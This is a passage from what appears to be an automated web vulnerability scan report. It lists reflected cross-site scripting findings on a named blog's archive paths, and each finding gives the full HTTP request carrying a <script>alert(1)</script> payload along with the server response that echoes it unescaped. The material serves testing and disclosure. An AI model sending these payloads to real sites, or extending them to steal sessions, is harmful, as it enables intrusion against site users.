User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives26b1e<script>alert(1)</script>c6bfcd2ec61/south-daktoa/ was not found on this server.</p>
...[SNIP]...

3.418. http://blog.pandora.com/pandora/archives/south-daktoa/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/south-daktoa/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11e8c<script>alert(1)</script>8fd48e0eb0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 354
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/south-daktoa11e8c<script>alert(1)</script>8fd48e0eb0b/ was not found on this server.</p>
...[SNIP]...

3.419. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/tennessee/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a87e3<script>alert(1)</script>667affef35b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa87e3<script>alert(1)</script>667affef35b/archives/tennessee/ was not found on this server.</p>
...[SNIP]...

3.420. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/tennessee/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be7ff<script>alert(1)</script>bb3bcc17fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbe7ff<script>alert(1)</script>bb3bcc17fa5/tennessee/ was not found on this server.</p>
...[SNIP]...

3.421. http://blog.pandora.com/pandora/archives/tennessee/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/tennessee/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0a19<script>alert(1)</script>050c2fa5c54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/tennesseec0a19<script>alert(1)</script>050c2fa5c54/ was not found on this server.</p>
...[SNIP]...

3.422. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/texas/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dd0c<script>alert(1)</script>f718eac7bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dd0c<script>alert(1)</script>f718eac7bb6/archives/texas/ was not found on this server.</p>
...[SNIP]...

3.423. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/texas/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76e6c<script>alert(1)</script>5b51d9c237f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives76e6c<script>alert(1)</script>5b51d9c237f/texas/ was not found on this server.</p>
...[SNIP]...

3.424. http://blog.pandora.com/pandora/archives/texas/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/texas/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ea264<script>alert(1)</script>98cd7486264 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/texasea264<script>alert(1)</script>98cd7486264/ was not found on this server.</p>
...[SNIP]...

3.425. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/utah/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54e68<script>alert(1)</script>3cadd9a1ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora54e68<script>alert(1)</script>3cadd9a1ed0/archives/utah/ was not found on this server.</p>
...[SNIP]...

3.426. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/utah/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e0467<script>alert(1)</script>c653de1c429 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese0467<script>alert(1)</script>c653de1c429/utah/ was not found on this server.</p>
...[SNIP]...

3.427. http://blog.pandora.com/pandora/archives/utah/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/utah/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cc949<script>alert(1)</script>5818dec138e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/utahcc949<script>alert(1)</script>5818dec138e/ was not found on this server.</p>
...[SNIP]...

3.428. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/virginia/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cecee<script>alert(1)</script>65ebaa61d8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracecee<script>alert(1)</script>65ebaa61d8c/archives/virginia/ was not found on this server.</p>
...[SNIP]...

3.429. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/virginia/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>50186e33060 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8fd5b<script>alert(1)</script>50186e33060/virginia/ was not found on this server.</p>
...[SNIP]...

3.430. http://blog.pandora.com/pandora/archives/virginia/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/virginia/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 795e1<script>alert(1)</script>4beca333580 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/virginia795e1<script>alert(1)</script>4beca333580/ was not found on this server.</p>
...[SNIP]...

3.431. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington-dc/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc6a7<script>alert(1)</script>380f8df8738 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoradc6a7<script>alert(1)</script>380f8df8738/archives/washington-dc/ was not found on this server.</p>
...[SNIP]...

3.432. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington-dc/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 893eb<script>alert(1)</script>a835002da8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives893eb<script>alert(1)</script>a835002da8a/washington-dc/ was not found on this server.</p>
...[SNIP]...

3.433. http://blog.pandora.com/pandora/archives/washington-dc/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington-dc/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a128f<script>alert(1)</script>9b5600a0222 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/washington-dca128f<script>alert(1)</script>9b5600a0222/ was not found on this server.</p>
...[SNIP]...

3.434. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4fa26<script>alert(1)</script>ccd92788417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
